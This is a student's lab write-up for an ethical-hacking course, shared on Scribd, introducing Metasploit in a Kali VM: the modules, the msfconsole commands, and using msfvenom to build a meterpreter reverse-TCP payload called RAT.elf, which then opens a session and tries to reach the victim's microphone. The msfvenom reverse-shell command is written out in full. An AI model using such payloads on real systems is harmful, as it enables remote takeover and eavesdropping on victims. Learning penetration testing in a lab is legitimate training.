Scribd Logo
Upload

Welcome to Scribd!

  • Institute of Computer Technology: Semester 6

    Uploaded by

    Het Patel
    1 views10 pages

    Original Title

    Practical 6

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    1 views10 pages

    Institute of Computer Technology: Semester 6

    Uploaded by

    Het Patel

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 10

    INSTITUTE OF

    SEMESTER 6

    COMPUTER
    TECHNOLOGY
    EH

    PREPARED BY:-
    YOGESH RATHOD
    EH PRACTICAL-6
    PRACTICAL-6
    Metaspliot Framework:
    Metasploit is one of the most powerful and widely used tools
    for penetration testing. In this tutorial, we will take you
    through the various concepts and techniques of Metasploit and
    explain how you can use them in a real-time environment. This
    tutorial is meant for instructional purpose only.

    Now,Turn on Kali VM and open terminal


    – Some of the useful folders to get started with metasploit
    are given below

    Modules:

    Exploit Modules:
    – Exploits in modules take advantage of a system
    vulnerability by often using simple scripts known as
    payloads.

    YOGESH RATHOD (19162171036)


    EH PRACTICAL-6
    Auxiliary and encoders modules:

    Starting metasploitable framework


    – Open apps and search for metasploitable and open it

    YOGESH RATHOD (19162171036)


    EH PRACTICAL-6
    To check the status of the database:

    To start the database if it is stopped:

    To open the help menu:

    YOGESH RATHOD (19162171036)


    EH PRACTICAL-6
    – To search any exploit:

    – the search command may be the most useful. With thousands


    of modules available, finding a specific module could be
    problematic and therefore the search command comes to the
    rescue.

    – To use any exploit and to know about the parameters:

    Here, show options is used to see required options as well as


    not mandatory options

    YOGESH RATHOD (19162171036)


    EH PRACTICAL-6
    To set any options,
    – set <parameters> <value>

    Here, after setting the option and listing all the options, we
    can see that the RHOSTS has been set

    To unset any options,

    – Unset <parameter>

    YOGESH RATHOD (19162171036)


    EH PRACTICAL-6
    MsfVenom:
    – Msfvenom is a command line instance of Metasploit that is
    used to generate and output all of the various types of
    shell code that are available in Metasploit.

    Reverse TCP Payload using msfvenom

    – Command: msfvenom -a x86 --platform linux -p


    linux/x86/meterpreter/reverse_tcp LHOST=10.0.2.15
    LPORT=4444 -f elf -o ./Desktop/RAT.elf
    – Here LHOST is the IP address of the current kali machine.
    It can be found using command:
    – Command : ip addr
    – Giving executable permission to the file

    YOGESH RATHOD (19162171036)


    EH PRACTICAL-6
    – Now open msfconsole and follow the below steps

    – Now run the generated RAT.elf payload from the terminal

    – Now type run command in the msfconsole

    YOGESH RATHOD (19162171036)


    EH PRACTICAL-6
    – Type help command in meterpreter to show all list of
    options
    – Some examples commands that can be performed in the victim
    machine are given below

    YOGESH RATHOD (19162171036)


    EH PRACTICAL-6
    – Trying to gain microphone access:

    – Due to some errors, we are not able to access microphone


    in virtual machine

    YOGESH RATHOD (19162171036)

    You might also like